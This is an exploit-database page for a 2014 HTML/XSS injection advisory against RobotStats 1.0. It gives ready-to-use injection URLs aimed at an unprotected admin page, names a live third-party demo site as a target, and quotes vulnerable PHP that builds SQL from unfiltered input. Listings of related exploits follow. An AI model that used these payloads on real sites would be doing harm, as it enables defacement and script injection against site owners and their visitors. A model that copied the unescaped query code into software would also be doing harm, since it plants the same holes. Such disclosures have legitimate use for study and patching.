Menu

Search for hundreds of thousands of exploits

"RobotStats 1.0 - HTML Injection"

Author

Exploit author

"ZoRLu Bugrahan"

Platform

Exploit platform

aix

Release date

Exploit published date

2014-11-24

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
# Title         : RobotStats v1.0 HTML Injection Vulnerability
# Author        : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home          : http://milw00rm.com / its online
# Twitter	    : https://twitter.com/milw00rm or @milw00rm
# Date          : 22.11.2014
# Demo		    : http://alpesoiseaux.free.fr/robotstats/
# Download 	    : http://www.robotstats.com/en/robotstats.zip
# Thks          : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
# Birkaciyiadam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )

Desc.:
no security for admin folder (session control, login panel or anyone... maybe its different vulnerability)
and no any filter for html code at robots.lib.php. you can inject your html code or xss code.

html inj.:

target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=

after you go here:

target.com/robotstats/info-robot.php?robot=(robot id)

or

target.com/robotstats/admin/robots.php you will see your html page

analysis: (/admin/robots.php)

include "robots.lib.php"; //line 26

else if ($rub == "ajouter")
{
  updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url); //line 65 (we will be analysis to robots.lib.php for line)
}

analysis: (/admin/robots.lib.php)

you look code. you will see blank control for "name" and "user agent" but will'nt see any filter for inject (// look line 203 no any filter) no any control or filter for code inject.

function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url)
//line 163 (remember function line 65 in robots.php)
{
  global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;

  // dans tous les cas :
  echo "<p class='normal'><a class='erreur'> ";
  $msg = "";

  // test du nom
  if ($nom == '')  //line 172 control of blank or not blank
  {
    $msg = $RS_LANG["BadRobotName"];
  }

  // test selon le mode de detection
  if ($detection == $RS_DETECTION_USER_AGENT) //line 178 control of your "detection mode" choice
  {
    if ($user_agent == '') //line 180 control of blank or not blank
    {
      $msg = $RS_LANG["BadUserAgent"];
    }
  }
  else if ($detection == $RS_DETECTION_IP)  //line 185 control of your "detection mode" choice
  {
    if ( ($ip1 == '') && ($ip2 == '') )  //line 187 control of your "ip1 and ip2" choice
    {
      $msg = $RS_LANG["IPNotSpecified"];
    }
  }
  else
  {
    $msg = $RS_LANG["BadDetectionMode"];
  }

  if ($msg != "")
  {
    echo $msg;
  }
  else
  {
    $liste_champs  = "nom, actif, user_agent, ip1, ip2, detection, descr_fr, descr_en, url";      // line 203 no any filter
    $liste_valeurs = "\"$nom\", \"$actif\", \"$user_agent\", \"$ip1\", \"$ip2\", \"$detection\", \"$descr_fr\", \"$descr_en\", \"$url\"";
    if ($robot > 0) // cas d'une modification et non d'un ajout       //line 205 control of your choice "wanna update any bot or add new bot"
    {
      $liste_champs  .= ", id";
      $liste_valeurs .= ", '$robot'";
      $sql = "REPLACE INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
      $res = mysql_query($sql) or erreurServeurMySQL($sql);
      echo $RS_LANG["RobotUpdated"];
    }
    else
    {
      $sql = "INSERT INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
      $res = mysql_query($sql) or erreurServeurMySQL($sql);
      echo $RS_LANG["RobotAdded"];
    }
  }

for demo:

http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=

after you go here:

http://alpesoiseaux.free.fr/robotstats/info-robot.php?robot=(robot id)

or 

http://alpesoiseaux.free.fr/robotstats/admin/robots.php

you will see your html page
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-12-04 "Xorg X11 Server (AIX) - Local Privilege Escalation" local aix 0xdono
2017-03-07 "Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities" webapps aix RandoriSec
2016-12-22 "IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation" local aix "Hector X. Monsegur"
2016-11-04 "IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation" local aix "Hector X. Monsegur"
2016-11-04 "IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Local Privilege Escalation" local aix "Hector X. Monsegur"
2015-10-30 "AIX 7.1 - 'lquerylv' Local Privilege Escalation" local aix "S2 Crew"
2015-09-08 "IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation" local aix "Kristian Erik Hermansen"
2014-11-24 "RobotStats 1.0 - HTML Injection" dos aix "ZoRLu Bugrahan"
2014-09-09 "PHP Stock Management System 1.02 - Multiple Vulnerabilities" dos aix jsass
2014-07-01 "Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure" dos aix "BGA Security"
Release Date Title Type Platform Author
2014-12-09 "Flat Calendar 1.1 - HTML Injection" webapps php "ZoRLu Bugrahan"
2014-11-24 "RobotStats 1.0 - HTML Injection" dos aix "ZoRLu Bugrahan"
2014-11-24 "RobotStats 1.0 - 'robot' SQL Injection" webapps php "ZoRLu Bugrahan"
2014-11-17 "Maarch LetterBox 2.8 - (Authentication Bypass) Insecure Cookies" webapps php "ZoRLu Bugrahan"
2014-10-31 "Who's Who Script - Cross-Site Request Forgery (Add Admin)" webapps php "ZoRLu Bugrahan"
2014-10-29 "Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite" dos windows "ZoRLu Bugrahan"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.